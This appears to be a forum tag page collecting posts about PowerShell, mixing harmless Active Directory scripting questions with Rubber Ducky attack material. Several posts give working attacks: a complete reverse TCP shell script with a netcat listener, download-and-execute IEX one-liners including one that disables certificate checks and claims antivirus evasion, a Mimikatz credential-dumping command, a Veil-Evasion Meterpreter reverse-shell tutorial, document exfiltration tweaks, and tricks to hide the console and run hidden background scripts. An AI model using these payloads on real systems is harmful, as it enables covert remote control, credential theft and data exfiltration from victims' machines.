Showing results for tags 'powershell'.
  1. Hi guys, I have the following PowerShell script, which finds the list of groups a user is a member of, formats them to name only, and then is supposed to list yes or no to which groups begin with the '@' symbol;

         $CurrentGroups = Get-ADuser JOEBLOGGS -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name}
         foreach($Group in $CurrentGroups) {
             if("$Group" -match "`@") { echo Yep $Group }
             else { echo Nope $Group }
         }

     User JOEBLOGGS is a member of;

         @Testone
         @Testtwo
         Testthree
         Testfour

     On running this script, I would expect the output to be;

         Yep @Testone
         Yep @Testtwo
         Nope Testthree
         Nope Testfour

     However, it instead states 'Yep' to all of them, not just the groups beginning with an '@' symbol. I have tried -like, -match, -contains as well as "\@", "@*" and "@". None work correctly. If I run -match "@Test", this works fine, but not all of the groups in our AD that begin with an @ symbol follow with the same digits, so I need this to work with just searching for all groups that begin with an @ symbol. Thank you.
  2. Hi All, I'm looking for help with PowerShell commands. I've got my duckberry pi working, and the plan is to have a duckyscript use PowerShell to download payloads from an HTTP or FTP server (which is running on my Android phone) on a local network. I've got SimpleHttpServer and Android FTPServer hosting a text file, and they seem to be working, because I can access the test file via browser at ip:port and through FileZilla. The closest I've gotten thus far to making this happen with PowerShell is this command:

         powershell "IEX (New-Object Net.Webclient).DownloadString('http://XXX.XXX.XXX.XXX:12345/derp.txt')"

     The error message I get is:

         The term 'TEST' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
         At line:1 char:5
         + TEST <<<<
             + CategoryInfo          : ObjectNotFound: (TEST:String) [], CommandNotFoundException
             + FullyQualifiedErrorId : CommandNotFoundException

     Now... the term 'TEST' is the only text within the derp.txt file, and it changes when I change the contents of the text file, so it appears to be able to access the right file in the right place. Now, I can't figure out how to download this file. Anyone have suggestions? Also, what would this PowerShell script look like if I were attempting to access a file at a local FTP server? And if that FTP server required a username and password? Thanks! OBL
  3. Reverse TCP Shell using Powershell Only

     Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/basic4/WiDucky)

     Just set up a netcat listener on the attacker machine with:

         nc -l 6673

     I've added code for the script to automatically reconnect to the attacker if connection is lost, and the script also returns shell error text to the listener too.

     The Powershell Script itself (could still use some tidying up - but works perfectly as is :)

         while (1 -eq 1) {
             $ErrorActionPreference = 'Continue';
             try {
                 #attempt initial connection
                 $client = New-Object System.Net.Sockets.TCPClient("",6673);
                 $stream = $client.GetStream();
                 [byte[]]$bytes = 0..255|%{0};
                 $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> ");
                 $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush();
                 while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
                     $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
                     if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;}
                     try {
                         #attempt to execute the received command
                         $sendback = (iex $recdata 2>&1 | Out-String );
                         $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
                     } catch {
                         $error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
                         $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> ";
                         cls;
                     }
                     $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2);
                     $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush();
                 }
             } catch {
                 #an initial connection error - close and wait 30 secs then retry
                 if($client.Connected) { $client.Close(); }
                 cls;
                 Start-Sleep -s 30;
             }
         }

     This is my first powershell script. But given how easy it was to get this working, I'm certainly going to use it more. Regards, Basic4.

     Attachment: PS_TCP4.ps1
  4. Hello Guys. I'm new in this community so nice to meet you! I'm very happy to finally write on this forum I've been reading for a while by now. I finally managed to build my Twin Ducky able to steal targeted files, following the last episodes of DK (2112-2113-2114). So of course I started enjoying playing with the parameters of e.cmd, and I was able to manage (unfortunately I have to admit, without any coding skills, don't get mad at me :P) to teach the rubber ducky not to steal just PDFs in the Documents folder but also to look for any pdf and doc file in all the folders belonging to %USERPROFILE%. Now, I wanted to go even further by making the process even faster. I thought the duration variable of the exfiltration process depends on the size of the pdf/doc/whatever document which we are trying to steal, and MAYBE we already know that the document we are looking for doesn't exceed a size of let's say 10-15 MB.. Wouldn't it be cool to write also a line to exclude those files? Wouldn't it be even faster? What do you think about this? Hope not to have written something stupid :S I'm not a native English speaker nor experienced in pentesting like you guys, so.. in that case forgive me. Let me know :) Have a nice day!
  5. Afternoon all - I've been manually playing with the evil twin duck mimikatz hack or memory leaker, whatever you wanna call it. Anywho - to test I copied the PowerShell script I found on another hak5 forum locally and call it like the below:

         powershell "IEX (New-Object Net.WebClient).DownloadString('c:\users\ballsdeep\desktop\test.ps1'); Invoke-Mimikatz -DumpCreds"

     Well, I get the following error and I know why:

         ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

     When I read through the PowerShell script, it's missing the privilege line: "privilege::debug". The below portion of the script is what I think I need to modify, because if I modify it to run the priv command only, the script executes and works (returns Privilege '20' OK). How do I run the priv command and then the dump passwords command?

         if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") {
             $ExeArgs = "sekurlsa::logonpasswords Exit"
         } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") {
             $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit"
         } else {
             $ExeArgs = $Command
         }
  6. Hi, I have been playing a little with Powershell and have come up with a proof-of-concept using Powershell for APT. I have a full description of the code here: http://www.cron.dk/powershell-hacking/ Please drop me a note if you find it interesting. Best regards, Alex
  7. Hi all, I have the following line of code in a PowerShell file, intended to remove a user from all Active Directory groups beginning with an @ symbol;

         Get-ADGroup -Filter 'name -like "@*"' | Remove-ADGroupMember -Members $UserID

     It actually works fine, and successfully removes them from the correct groups, however the script locks my admin account every time it's run. Weird! I suspect it's to do with it 'using up' my Kerberos authentication tokens (it uses too many, as it runs for every single AD group beginning with @), or it thinks I'm trying to do something malicious because I'm sending such a large amount of commands in a short time? Is there a way for me to amend this line of code, so that instead of running Remove-ADGroupMember for every single @ group in the Active Directory, it only runs for the groups that the user is a member of? Or any other ideas? Thank you.
  8. Hi all, I'm using...

         Get-ADuser $UserID -property MemberOf | % {$_.MemberOf | Get-ADGroup | select Name | sort name}

     ...to nicely list all of the Active Directory groups that a user is a member of, in an easy-to-read format. I'm trying to only list the groups that begin with an @ sign. So instead of...

         @Group 1
         @Group 2
         Group 3
         Group 4

     ...I would get just...

         @Group 1
         @Group 2

     I'm then looking to remove these groups from the user's account. So, in summary;

         Get only the MemberOf groups beginning with @, for a user
         Remove user from these groups

     How would I go about this? I've been playing for a while, but have got no further than the script above. Thank you,
  9. Hi all, I'm looking to make a script, in either batch or PowerShell, that will give a user access to a folder and all folders leading down to it. So, it would;

         Ask for input of Active Directory UserID
         Ask for input of a folder path
         List all of the security groups for the first folder in the path and allow selection of which one the AD UserID will be added to.
         List all of the security groups for the second folder in the path and allow selection of which one the AD UserID will be added to.
         List all of the security groups for the third folder in the path and allow selection of which one the AD UserID will be added to.
         etc.

     So, if user JBLOGGS wanted access to folder '\\Here\There\Everywhere', the script would;

         List the security groups for the folder '\\Here' and prompt for which AD group to add user JBLOGGS to.
         List the security groups for the folder '\\Here\There' and prompt for which AD group to add user JBLOGGS to.
         List the security groups for the folder '\\Here\There\Everywhere' and prompt for which AD group to add user JBLOGGS to.

     Note - The security groups for a folder are normally viewable in Windows by right clicking in a folder and going to 'Properties > Security > Group or user names'. Hopefully this makes sense, if not please let me know. Please note that I understand the script for adding a user to an AD group, that's easy. The struggle is getting a script to prompt which security group for each level of the folder path the user should be added to. Thank you in advance.
  10. xor-function

     I just wanted to let everybody here know about ps2exe, if you don't already. You can find it on TechNet if you search for it. What it does is compile a script to an executable by using a C# source code template that runs the script using the System.Management.Automation assembly. Since it uses a class library it stands a pretty good chance of bypassing any restrictions on the Powershell.exe program file. This is an example script I compiled using ps2exe.

         function start-download {
             [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
             IEX (New-Object System.Net.Webclient).DownloadString('https://some-domain.com/ps-script.ps1')
             [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $false }
         }
         start-download

     This way you can change the code server side without having to recompile the binary unless you need to change the URL. So far AV doesn't light up and it seems to be working in Windows 10.
  11. Going to try out my rubber ducky on a Windows 7 machine. What can I utilize if the target Windows 7 machine has PowerShell disabled and won't allow it to be installed or run? I'm pretty sure it is being blocked by group policy.
  12. Below are instructions for using Veil-Evasion to produce a Windows PowerShell payload for a Meterpreter reverse TCP connection and injecting it using a USB Rubber Ducky. This is my first tutorial post, so if my formatting is a bit off... too bad ;)

     This method has a few benefits over the method provided using the "Simple-Ducky" program:

         It is injected completely through text input typed in by the Ducky into the Windows Command Shell.
         It does not require the target computer to download a compiled file from a web server to set up the connection.
         You do not have to host a web server for the payload. (Fewer open ports on your machine, always a good thing.)
         Virus scanners are (hopefully) not going to pick this up because it is being entered directly into the Command Shell by Ducky.

     The flip side is that this is a larger payload for Ducky to type out, so you will have to plan accordingly.

     Initial Setup (If you are running Kali, BlackBox, Backtrack, etc. you are probably almost set up already.)

         Install and set up Metasploit if you have not already.
         Install and set up Veil-Evasion (Homepage is here). Veil-Evasion is now available in the Kali repository. Use: apt-get install veil-evasion -y
         Note on initial install: You need to run veil-evasion after it is loaded by apt-get to set everything up. It says you don't have to run it as root, but you need to run it as root! Setup can take a bit.
         Set up Ducky Encoder or whatever you choose to use to make your inject.bin.

     Payload Generation

         Start veil-evasion.
         Type "list" to see the list of available payloads.
         Enter the number for the "powershell/meterpreter/rev_tcp" payload. (Was 22 for me.)
         Set your LHOST and LPORT the same as you would do setting up a payload in Metasploit.
         Type "generate".
         Enter the name you want for the payload.
         Veil will generate the payload in a .bat file in the "Veil-Output" directory under "source". (Most likely in the /usr/share/ directory.)
         Veil will also generate a Metasploit resource file for setting up a listener that you can use if you want. However, if you are behind a NAT router you will need to plan accordingly.
         Find and open the .bat file in the text editor of your choice and copy off the first section of the file as follows: powershell.exe -Nop.....ReadToEnd();" (The first .ReadToEnd() and don't miss the quotation mark at the end, you will need that.)
         If your target is a 64 bit machine you will need to add "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\" prior to the powershell.exe in order for your payload to work.
         Set up your Ducky script as you like to account for driver install, etc. Have it open a standard command shell and copy and paste the text you cut out above into the Ducky script as a STRING.
         Create your inject.bin file and put it on your Ducky.

     Operation

         Start a windows/meterpreter/reverse_tcp listener in Metasploit on your machine. (32 bit, not the x64 payload)
         Plug the Ducky into your target machine and away you go.
         The Command Shell window will automatically close once the PowerShell script begins to execute.
         You may need to migrate to another x86 process to get full Meterpreter functions.

     A few notes

     If you try to run this several times in quick succession on a target machine the subsequent tries may not go through as PowerShell likes to hang on for a bit. Killing the initial process after migrating might fix this.

     I've tested this on the following:

         Windows 7 Pro x64 (physical machine with a physical network, through a restrictive firewall... Reverse connections rock!)
         Windows 8.1 Pro x64 - Virtual
         Windows 10 Pro x64 Technical Preview - Virtual
         Windows Server 2008 R2 - Virtual
         Windows Server 2012 R2 - Virtual

     Enjoy.
  13. I've been working on trying to create stealthy attacks with the Rubber Ducky. I've found a way to hide the powershell console while keeping focus (which is obviously needed for input from the Ducky). The basic idea is to move the console to the edge of the screen and then shrink the size of the console and it actually disappears. Here are the commands for the basic idea:

         REM Once powershell is up and running
         ALT SPACE
         STRING m
         LEFTARROW
         REPEAT 50
         STRING [console]::WindowHeight=1
         ENTER
         STRING [console]::WindowWidth=1
         ENTER

     I found that shrinking the console size is faster than moving the console, so I played around with doing both several times to try and make the console disappear faster. To make sure the Ducky still had focus and was running, I had it send me an email. Here is my test script that uses this hiding technique:

         REM Author: desert33
         REM Name: hidePS.txt
         REM Purpose: Try to Hide PowerShell for a more stealthy approach.
         REM Encoder V2.4
         REM Using the run command for a broader OS base.
         REM *** Initial Delay ***
         DELAY 2000
         REM *** Open powershell ***
         GUI r
         DELAY 250
         STRING powershell
         ENTER
         DELAY 400
         REM *** Hide PowerShell ***
         STRING [console]::WindowHeight=10
         ENTER
         STRING [console]::WindowWidth=10
         ENTER
         ALT SPACE
         STRING m
         LEFTARROW
         REPEAT 30
         STRING [console]::WindowHeight=5
         ENTER
         STRING [console]::WindowWidth=5
         ENTER
         ALT SPACE
         STRING m
         LEFTARROW
         REPEAT 10
         STRING [console]::WindowHeight=1
         ENTER
         STRING [console]::WindowWidth=1
         ENTER
         REM *** Send an email to prove Ducky is working ***
         STRING $SMTPServer = 'smtp.gmail.com'
         ENTER
         STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
         ENTER
         STRING $SMTPInfo.EnableSsl = $true
         ENTER
         STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('username', 'password');
         ENTER
         STRING $ReportEmail = New-Object System.Net.Mail.MailMessage
         ENTER
         STRING $ReportEmail.From = 'from@email.com'
         ENTER
         STRING $ReportEmail.To.Add('to@email.com')
         ENTER
         STRING $ReportEmail.Subject = 'Hello'
         ENTER
         STRING $ReportEmail.Body = '"You got Ducked. Better luck next time." -desert33'
         ENTER
         STRING $SMTPInfo.Send($ReportEmail)
         ENTER
         DELAY 100
         REM *** Exit ***
         STRING EXIT
         ENTER
  14. This payload will automatically eject all the CD trays of the target system at the beginning of every hour. The way I go about this is to create a PowerShell script from the command line and then execute it as a background process with the "powershell -windowstyle hidden" command. I can see a lot of potential in having this run at startup, but I had a wave of mercy when I wrote the script. Enjoy

         REM Name: Poltergeist
         REM Author: theGANOUSH
         REM Purpose: To mess with my coworkers by forcing their CD drives to open at the start of every hour.
         REM The PowerShell code was found and modified from: http://powershell.com/cs/blogs/tips/archive/2009/04/24/ejecting-cds.aspx
         REM Open Command Prompt & Navigate to %temp%
         DELAY 5000
         DELAY 10000
         GUI r
         DELAY 300
         STRING cmd.exe
         ENTER
         DELAY 300
         STRING CD %temp%
         ENTER
         REM Create PowerShell Script
         STRING copy con Poltergeist.ps1
         ENTER
         STRING Do
         ENTER
         STRING {
         ENTER
         STRING $minute = Get-Date -UFormat "%M"
         ENTER
         STRING If($minute -eq "00")
         ENTER
         STRING {
         ENTER
         STRING $Drives = Get-WmiObject Win32_Volume -Filter "DriveType=5" | select -exp DriveLetter
         ENTER
         STRING foreach($Drive in $Drives)
         ENTER
         STRING {
         ENTER
         STRING Invoke-Command -ScriptBlock {
         ENTER
         STRING param($Drive)
         ENTER
         STRING $Drive
         ENTER
         STRING $sa = New-Object -comObject Shell.Application
         ENTER
         STRING $sa.Namespace(17).parseName($Drive)
         ENTER
         STRING $sa.Namespace(17).ParseName("$Drive").InvokeVerb("Eject")
         ENTER
         STRING } -ArgumentList $Drive
         ENTER
         STRING }
         ENTER
         STRING }
         STRING Start-Sleep -s 60
         ENTER
         STRING }
         ENTER
         STRING until(1 -gt 5)
         ENTER
         CONTROL z
         ENTER
         REM and execute for effect...
         STRING powershell -windowstyle hidden -file .\Poltergeist.ps1
         ENTER